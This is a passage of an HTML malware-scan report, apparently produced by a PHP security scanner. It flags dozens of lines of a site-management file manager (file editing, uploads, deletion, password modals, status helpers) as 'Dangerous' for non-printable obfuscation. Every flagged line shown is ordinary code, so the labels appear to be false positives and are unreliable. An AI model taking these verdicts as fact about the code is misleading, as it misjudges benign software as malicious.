</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3372</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">fmOpenFile</span><span style="color: #007700">(</span><span style="color: #0000BB">path</span><span style="color: #007700">, </span><span style="color: #0000BB">name</span><span style="color: #007700">, </span><span style="color: #0000BB">size</span><span style="color: #007700">, </span><span style="color: #0000BB">ext</span><span style="color: #007700">) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 338</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">site_statuses_migrate_from_legacy_state</span><span style="color: #007700">();</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3419</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">fmStartEdit</span><span style="color: #007700">() {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3434</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">fmDiscardEdit</span><span style="color: #007700">() {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3439</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">fmSaveFile</span><span style="color: #007700">() {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3455</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function(){ </span><span style="color: #0000BB">fmDiscardEdit</span><span style="color: #007700">(); </span><span style="color: #0000BB">statusEl</span><span style="color: #007700">.</span><span style="color: #0000BB">textContent</span><span style="color: #007700">=</span><span style="color: #DD0000">''</span><span style="color: #007700">; }, </span><span style="color: #0000BB">1500</span><span style="color: #007700">);</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 345</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$data</span><span style="color: #007700">[</span><span style="color: #DD0000">'sites'</span><span style="color: #007700">];</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3468</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">fmNewFile</span><span style="color: #007700">() {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3477</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">closeNewFileModal</span><span style="color: #007700">() {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 347</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$data</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3480</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">fmCreateFile</span><span style="color: #007700">() {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 349</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">save_site_statuses_map</span><span style="color: #007700">(</span><span style="color: #0000BB">$sites_map</span><span style="color: #007700">) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 34</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">UP_TO_WP_STORAGE_DIR</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3519</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">fmImportArchive</span><span style="color: #007700">() {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3524</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">fmUploadArchive</span><span style="color: #007700">(</span><span style="color: #0000BB">file</span><span style="color: #007700">) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3551</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">fmRenameItem</span><span style="color: #007700">(</span><span style="color: #0000BB">path</span><span style="color: #007700">, </span><span style="color: #0000BB">name</span><span style="color: #007700">, </span><span style="color: #0000BB">isDir</span><span style="color: #007700">) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3575</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function(</span><span style="color: #0000BB">e</span><span style="color: #007700">) { </span><span style="color: #0000BB">statusEl</span><span style="color: #007700">.</span><span style="color: #0000BB">textContent </span><span style="color: #007700">= </span><span style="color: #DD0000">'❌ ' </span><span style="color: #007700">+ </span><span style="color: #0000BB">e</span><span style="color: #007700">.</span><span style="color: #0000BB">message</span><span style="color: #007700">; });</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3577</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">fmDeleteItem</span><span style="color: #007700">(</span><span style="color: #0000BB">path</span><span style="color: #007700">, </span><span style="color: #0000BB">name</span><span style="color: #007700">, </span><span style="color: #0000BB">isDir</span><span style="color: #007700">) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3604</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">fmRenameSelected</span><span style="color: #007700">() {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3610</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">fmDeleteSelected</span><span style="color: #007700">() {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3617</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">fmCopyPath</span><span style="color: #007700">() {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3620</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function(){ </span><span style="color: #0000BB">el</span><span style="color: #007700">.</span><span style="color: #0000BB">style</span><span style="color: #007700">.</span><span style="color: #0000BB">color</span><span style="color: #007700">=</span><span style="color: #0000BB">old</span><span style="color: #007700">; },</span><span style="color: #0000BB">1500</span><span style="color: #007700">);</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3623</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">fmCopyContent</span><span style="color: #007700">() {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3627</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function(){ </span><span style="color: #0000BB">btn</span><span style="color: #007700">.</span><span style="color: #0000BB">textContent</span><span style="color: #007700">=</span><span style="color: #DD0000">'📋'</span><span style="color: #007700">; },</span><span style="color: #0000BB">2000</span><span style="color: #007700">);</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3630</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">fmFmtSize</span><span style="color: #007700">(</span><span style="color: #0000BB">bytes</span><span style="color: #007700">) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3632</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">bytes</span><span style="color: #007700">+</span><span style="color: #DD0000">' B'</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3633</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return (</span><span style="color: #0000BB">bytes</span><span style="color: #007700">/</span><span style="color: #0000BB">1024</span><span style="color: #007700">).</span><span style="color: #0000BB">toFixed</span><span style="color: #007700">(</span><span style="color: #0000BB">1</span><span style="color: #007700">)+</span><span style="color: #DD0000">' KB'</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3634</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return (</span><span style="color: #0000BB">bytes</span><span style="color: #007700">/</span><span style="color: #0000BB">1048576</span><span style="color: #007700">).</span><span style="color: #0000BB">toFixed</span><span style="color: #007700">(</span><span style="color: #0000BB">1</span><span style="color: #007700">)+</span><span style="color: #DD0000">' MB'</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3636</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">escJs</span><span style="color: #007700">(</span><span style="color: #0000BB">s</span><span style="color: #007700">) { return </span><span style="color: #0000BB">s</span><span style="color: #007700">.</span><span style="color: #0000BB">replace</span><span style="color: #007700">(/\\/</span><span style="color: #0000BB">g</span><span style="color: #007700">,</span><span style="color: #DD0000">'\\\\'</span><span style="color: #007700">).</span><span style="color: #0000BB">replace</span><span style="color: #007700">(/</span><span style="color: #DD0000">'/g,"\\'"); }</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3637</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">escHtml</span><span style="color: #007700">(</span><span style="color: #0000BB">s</span><span style="color: #007700">) { return </span><span style="color: #0000BB">s</span><span style="color: #007700">.</span><span style="color: #0000BB">replace</span><span style="color: #007700">(/&/</span><span style="color: #0000BB">g</span><span style="color: #007700">,</span><span style="color: #DD0000">'&amp;'</span><span style="color: #007700">).</span><span style="color: #0000BB">replace</span><span style="color: #007700">(/</</span><span style="color: #0000BB">g</span><span style="color: #007700">,</span><span style="color: #DD0000">'&lt;'</span><span style="color: #007700">).</span><span style="color: #0000BB">replace</span><span style="color: #007700">(/>/</span><span style="color: #0000BB">g</span><span style="color: #007700">,</span><span style="color: #DD0000">'&gt;'</span><span style="color: #007700">).</span><span style="color: #0000BB">replace</span><span style="color: #007700">(/</span><span style="color: #DD0000">"/g,'&quot;'); }</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3639</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function(</span><span style="color: #0000BB">e</span><span style="color: #007700">){ if(</span><span style="color: #0000BB">e</span><span style="color: #007700">.</span><span style="color: #0000BB">target</span><span style="color: #007700">===</span><span style="color: #0000BB">this</span><span style="color: #007700">) </span><span style="color: #0000BB">closeFM</span><span style="color: #007700">(); });</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3660</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">viewFile</span><span style="color: #007700">(</span><span style="color: #0000BB">filepath</span><span style="color: #007700">, </span><span style="color: #0000BB">siteRoot</span><span style="color: #007700">) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3685</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">closeViewModal</span><span style="color: #007700">() { </span><span style="color: #0000BB">document</span><span style="color: #007700">.</span><span style="color: #0000BB">getElementById</span><span style="color: #007700">(</span><span style="color: #DD0000">'view-modal-overlay'</span><span style="color: #007700">).</span><span style="color: #0000BB">classList</span><span style="color: #007700">.</span><span style="color: #0000BB">remove</span><span style="color: #007700">(</span><span style="color: #DD0000">'active'</span><span style="color: #007700">); }</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3686</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">copyFileContent</span><span style="color: #007700">() {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3691</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function(){ </span><span style="color: #0000BB">btn</span><span style="color: #007700">.</span><span style="color: #0000BB">textContent</span><span style="color: #007700">=</span><span style="color: #DD0000">'📋 Копировать'</span><span style="color: #007700">; },</span><span style="color: #0000BB">2000</span><span style="color: #007700">);</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3694</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function(</span><span style="color: #0000BB">e</span><span style="color: #007700">){ if(</span><span style="color: #0000BB">e</span><span style="color: #007700">.</span><span style="color: #0000BB">target</span><span style="color: #007700">===</span><span style="color: #0000BB">this</span><span style="color: #007700">) </span><span style="color: #0000BB">closeViewModal</span><span style="color: #007700">(); });</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3698</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">openModal</span><span style="color: #007700">(</span><span style="color: #0000BB">username</span><span style="color: #007700">, </span><span style="color: #0000BB">filepath</span><span style="color: #007700">, </span><span style="color: #0000BB">hashId</span><span style="color: #007700">) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 36</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">dirname</span><span style="color: #007700">(</span><span style="color: #0000BB">__FILE__</span><span style="color: #007700">) . </span><span style="color: #DD0000">'/data'</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3710</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">closeModal</span><span style="color: #007700">() { </span><span style="color: #0000BB">document</span><span style="color: #007700">.</span><span style="color: #0000BB">getElementById</span><span style="color: #007700">(</span><span style="color: #DD0000">'modal-overlay'</span><span style="color: #007700">).</span><span style="color: #0000BB">classList</span><span style="color: #007700">.</span><span style="color: #0000BB">remove</span><span style="color: #007700">(</span><span style="color: #DD0000">'active'</span><span style="color: #007700">); }</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3711</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">togglePw</span><span style="color: #007700">() { var </span><span style="color: #0000BB">f</span><span style="color: #007700">=</span><span style="color: #0000BB">document</span><span style="color: #007700">.</span><span style="color: #0000BB">getElementById</span><span style="color: #007700">(</span><span style="color: #DD0000">'modal-password'</span><span style="color: #007700">); </span><span style="color: #0000BB">f</span><span style="color: #007700">.</span><span style="color: #0000BB">type</span><span style="color: #007700">=</span><span style="color: #0000BB">f</span><span style="color: #007700">.</span><span style="color: #0000BB">type</span><span style="color: #007700">===</span><span style="color: #DD0000">'password'</span><span style="color: #007700">?</span><span style="color: #DD0000">'text'</span><span style="color: #007700">:</span><span style="color: #DD0000">'password'</span><span style="color: #007700">; }</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3712</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">togglePw2</span><span style="color: #007700">() { var </span><span style="color: #0000BB">f</span><span style="color: #007700">=</span><span style="color: #0000BB">document</span><span style="color: #007700">.</span><span style="color: #0000BB">getElementById</span><span style="color: #007700">(</span><span style="color: #DD0000">'modal-password2'</span><span style="color: #007700">); </span><span style="color: #0000BB">f</span><span style="color: #007700">.</span><span style="color: #0000BB">type</span><span style="color: #007700">=</span><span style="color: #0000BB">f</span><span style="color: #007700">.</span><span style="color: #0000BB">type</span><span style="color: #007700">===</span><span style="color: #DD0000">'password'</span><span style="color: #007700">?</span><span style="color: #DD0000">'text'</span><span style="color: #007700">:</span><span style="color: #DD0000">'password'</span><span style="color: #007700">; }</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3713</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">savePassword</span><span style="color: #007700">() {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3745</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function(</span><span style="color: #0000BB">e</span><span style="color: #007700">){ if(</span><span style="color: #0000BB">e</span><span style="color: #007700">.</span><span style="color: #0000BB">target</span><span style="color: #007700">===</span><span style="color: #0000BB">this</span><span style="color: #007700">) </span><span style="color: #0000BB">closeModal</span><span style="color: #007700">(); });</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 376</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">site_statuses_migrate_from_legacy_state</span><span style="color: #007700">() {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 388</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$imported</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 390</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">merge_site_status</span><span style="color: #007700">(&</span><span style="color: #0000BB">$site</span><span style="color: #007700">, </span><span style="color: #0000BB">$statuses</span><span style="color: #007700">, </span><span style="color: #0000BB">$name_counts </span><span style="color: #007700">= </span><span style="color: #0000BB">null</span><span style="color: #007700">) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 398</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">site_status_label</span><span style="color: #007700">(</span><span style="color: #0000BB">$status</span><span style="color: #007700">) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 405</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return isset(</span><span style="color: #0000BB">$labels</span><span style="color: #007700">[</span><span style="color: #0000BB">$status</span><span style="color: #007700">]) ? </span><span style="color: #0000BB">$labels</span><span style="color: #007700">[</span><span style="color: #0000BB">$status</span><span style="color: #007700">] : </span><span style="color: #0000BB">$labels</span><span style="color: #007700">[</span><span style="color: #DD0000">'pending'</span><span style="color: #007700">];</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 407</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
